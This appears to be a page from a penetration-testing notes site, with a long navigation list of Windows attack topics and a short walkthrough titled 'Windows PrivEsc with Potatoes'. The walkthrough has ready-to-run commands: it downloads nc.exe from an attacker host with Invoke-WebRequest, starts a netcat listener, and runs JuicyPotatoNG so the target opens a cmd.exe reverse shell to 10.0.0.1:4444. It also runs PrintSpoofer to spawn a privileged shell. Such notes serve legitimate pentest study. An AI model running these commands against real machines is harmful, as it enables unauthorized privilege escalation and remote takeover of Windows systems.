Exploits related to Windows

Active Directory

AD CS (Active Directory Certificate Services) Pentesting

AS-REP Roasting

Active Directory Pentesting

BloodHound SharpHound for Active Directory

Kerberos Pentesting

LAPS (Local Administrator Password Solution) Pentesting

LDAP (Lightweight Directory Access Protocol) Pentesting

NTLM (New Technology LAN Manager) Pentesting

Netlogon Elavasion of Privilege

SMB (Server Message Block) Pentesting

Protocol

MSRPC (Microsoft Remote Procedure Call) Pentesting

RDP (Remote Desktop Protocol) Pentesting

WinRM (Windows Remote Management) Pentesting

Privilege Escalation

Iperius Backup Service Privilege Escalation

ManageEngine ADSelfService Plus PrivEsc

Mimikatz

Outlook Reminder Privilege Escalation

UAC Windows Privilege Escalation

Windows PrivEsc with Potatoes

Windows PrivEsc with Registry Keys

Windows PrivEsc with SeBackupPrivilege

Windows PrivEsc with Unquoted Service Path

Windows Privilege Escalation

Post Exploitation

Windows Pivoting

PowerShell

PowerView

Others

Dumping Windows Password Hashes

LocalPotato

Microsoft Outlook Message (.msg)

Microsoft Word Pentesting

WSL Pentesting

Windows API

Windows Basic Features

Windows Disk Management

Windows Forensics

Windows Pivoting

Windows Print Spooler Service

Windows Remote Code Execution from Linux

Windows XML EventLog (EVTX)

Windows PrivEsc with Potatoes

Last modified: 2023-04-08

Privilege Escalation Windows

JuicyPotato

We can use a payload from here.
Before exploiting, we need to upload nc.exe (it is available from here) to the target machine.

Invoke-WebRequest -Uri http://10.0.0.1:8000/nc.exe -OutFile c:\Temp\nc.exe

Next start a listener in local machine.

nc -lvnp 4444

Then execute JuicyPotato in target machine.

JuicyPotatoNG.exe -t * -p "c:\Temp\nc.exe" -a "10.0.0.1 4444 -e cmd.exe"

PrintSpoofer

this repo is available for compiled executable.

PrintSpoofer.exe -i -c cmd

References

https://jlajara.gitlab.io/Potatoes_Windows_Privesc

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.